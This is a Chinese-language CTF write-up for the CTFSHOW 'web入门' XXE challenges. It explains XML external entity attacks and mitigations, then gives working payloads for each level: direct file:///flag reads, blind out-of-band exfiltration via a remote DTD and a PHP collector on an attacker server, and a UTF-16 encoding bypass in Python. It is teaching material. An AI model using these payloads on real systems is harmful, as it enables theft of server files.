CTFSHOW-web入门-XXE
XML
XML即 可擴(kuò)展標(biāo)記語(yǔ)言(EXtensible Markup Language),是一種標(biāo)記語(yǔ)言,其標(biāo)簽沒(méi)有預(yù)定義,您需要自行定義標(biāo)簽,是W3C的推薦標(biāo)準(zhǔn)。其于HTML的區(qū)別是:
- HTML 被設(shè)計(jì)用來(lái)顯示數(shù)據(jù)
- XML 被設(shè)計(jì)用來(lái)傳輸和存儲(chǔ)數(shù)據(jù)
XML文檔結(jié)構(gòu)包括:
- XML聲明
- DTD文檔類型定義(可選)
- 文檔元素
XML是一種非常流行的標(biāo)記語(yǔ)言,在1990年代后期首次標(biāo)準(zhǔn)化,并被無(wú)數(shù)的軟件項(xiàng)目所采用。它用于配置文件,文檔格式(如OOXML,ODF,PDF,RSS,...),圖像格式(SVG,EXIF標(biāo)題)和網(wǎng)絡(luò)協(xié)議(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,...),他應(yīng)用的如此的普遍以至于他出現(xiàn)的任何問(wèn)題都會(huì)帶來(lái)災(zāi)難性的結(jié)果。
在解析外部實(shí)體的過(guò)程中,XML解析器可以根據(jù)URL中指定的方案(協(xié)議)來(lái)查詢各種網(wǎng)絡(luò)協(xié)議和服務(wù)(DNS,FTP,HTTP,SMB等)。 外部實(shí)體對(duì)于在文檔中創(chuàng)建動(dòng)態(tài)引用非常有用,這樣對(duì)引用資源所做的任何更改都會(huì)在文檔中自動(dòng)更新。 但是,在處理外部實(shí)體時(shí),可以針對(duì)應(yīng)用程序啟動(dòng)許多攻擊。 這些攻擊包括泄露本地系統(tǒng)文件,這些文件可能包含密碼和私人用戶數(shù)據(jù)等敏感數(shù)據(jù),或利用各種方案的網(wǎng)絡(luò)訪問(wèn)功能來(lái)操縱內(nèi)部應(yīng)用程序。 通過(guò)將這些攻擊與其他實(shí)現(xiàn)缺陷相結(jié)合,這些攻擊的范圍可以擴(kuò)展到客戶端內(nèi)存損壞,任意代碼執(zhí)行,甚至服務(wù)中斷,具體取決于這些攻擊的上下文。
XXE漏洞主要針對(duì)web服務(wù)危險(xiǎn)的引用的外部實(shí)體并且未對(duì)外部實(shí)體進(jìn)行敏感字符的過(guò)濾,從而可以造成命令執(zhí)行,目錄遍歷等。
對(duì)于傳統(tǒng)的XXE來(lái)說(shuō),要求攻擊者只有在服務(wù)器有回顯或者報(bào)錯(cuò)的基礎(chǔ)上才能使用XXE漏洞來(lái)讀取服務(wù)器端文件,如果沒(méi)有回顯則可以使用Blind XXE漏洞來(lái)構(gòu)建一條帶外信道提取數(shù)據(jù)。
xxe漏洞存在是因?yàn)閄ML解析器解析了用戶發(fā)送的不可信數(shù)據(jù)。然而,要去校驗(yàn)DTD(document type definition)中SYSTEM標(biāo)識(shí)符定義的數(shù)據(jù),并不容易,也不大可能。大部分的XML解析器默認(rèn)對(duì)于XXE攻擊是脆弱的。因此,最好的解決辦法就是配置XML處理器去使用本地靜態(tài)的DTD,不允許XML中含有任何自己聲明的DTD。通過(guò)設(shè)置相應(yīng)的屬性值為false,XML外部實(shí)體攻擊就能夠被阻止。因此,可將外部實(shí)體、參數(shù)實(shí)體和內(nèi)聯(lián)DTD 都被設(shè)置為false,從而避免基于XXE漏洞的攻擊。
web373
題目給出源碼,一個(gè)有回顯的文件讀取漏洞
<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);$creds = simplexml_import_dom($dom);$ctfshow = $creds->ctfshow;echo $ctfshow; } highlight_file(__FILE__); ?>抓包發(fā)送如下內(nèi)容
<?xml version="1.0"?> <!DOCTYPE xml [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <H3rmesk1t><ctfshow>&xxe;</ctfshow> </H3rmesk1t>得到flag?
web374
無(wú)回顯的文件讀取,需要進(jìn)行外帶
<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); } highlight_file(__FILE__); ?>抓包發(fā)送如下內(nèi)容
<!DOCTYPE ANY[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx:xxxx/xxe.xml"> %remote; %send; ]>在服務(wù)器放置xxe.php?和?xxe.xml?兩個(gè)文件
<?php $content = $_GET['1']; if(isset($content)){file_put_contents('flag.txt','更新時(shí)間:'.date("Y-m-d H:i:s")."\n".$content); }else{echo 'no data input'; } <!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'" > %all;web375
無(wú)回顯的文件讀取,且禁用了版本號(hào),和上面一樣進(jìn)行外帶不寫(xiě)版本號(hào)即可
<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){die('error'); } if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); } highlight_file(__FILE__); ?>抓包發(fā)送如下內(nèi)容
<!DOCTYPE ANY[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx:xxxx/xxe.xml"> %remote; %send; ]>在服務(wù)器放置xxe.php?和?xxe.xml?兩個(gè)文件
<?php $content = $_GET['1']; if(isset($content)){file_put_contents('flag.txt','更新時(shí)間:'.date("Y-m-d H:i:s")."\n".$content); }else{echo 'no data input'; } <!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'" > %all;web376
無(wú)回顯的文件讀取,且禁用了版本號(hào),和上面一樣進(jìn)行外帶不寫(xiě)版本號(hào)即可
<?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(preg_match('/<\?xml version="1\.0"/i', $xmlfile)){die('error'); } if(isset($xmlfile)){$dom = new DOMDocument();$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); } highlight_file(__FILE__); ?>抓包發(fā)送如下內(nèi)容
<!DOCTYPE ANY[ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx:xxxx/xxe.xml"> %remote; %send; ]>在服務(wù)器放置xxe.php?和?xxe.xml?兩個(gè)文件
<?php $content = $_GET['1']; if(isset($content)){file_put_contents('flag.txt','更新時(shí)間:'.date("Y-m-d H:i:s")."\n".$content); }else{echo 'no data input'; } <!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'" > %all;web377
payload
import requestsurl = 'http://ddca1082-2f62-4f7f-b8b1-e369e33aa168.chall.ctf.show/' payload = """<!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % aaa SYSTEM "http://xxx/test.dtd"> %aaa; ]> <root>123</root>""" payload = payload.encode('utf-16') requests.post(url ,data=payload)開(kāi)監(jiān)聽(tīng)拿flag
web378
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <user><username>&xxe;</username><password>&xxe;</password></user>總結(jié)
以上是生活随笔為你收集整理的CTFSHOW-web入门-XXE的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: Python3教程--和小名一起学Pyt
- 下一篇: 小白理解k-svd算法